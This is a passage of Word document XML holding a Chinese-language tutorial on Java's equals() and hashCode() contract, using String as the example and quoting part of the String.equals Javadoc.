          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>必须保证</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>相等的对象必须具有相等的哈希码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，也就是当两个对象通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>比较的结果为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>时，这两个对象调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>（）方法生成的哈希码必须相等。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如何保证相等，可以参考下面的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>复写</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法的判断根据和计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的依据相同。如</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法是比较字符串每个字符，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>也是通过对该字符串每个字符的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ASC</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>码简单的算术运算所得，这样就可以保证相同的字符串的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>相同且</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals()</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>为真。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>方法的源代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:noProof/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="233" name="图片 7" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * Compares this string to the specified object.  The result is {@code</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    * true} if and only if the argument is not {@code null} and is a {@code</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * String} object that represents the same sequence of characters as this</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * @param  anObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *         The object to compare this {@code String} against</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    * @return  {@code true} if the given object represents a {@code String}</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *          equivalent to this string, {@code false} otherwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRPr="00744ED7" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>    *</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
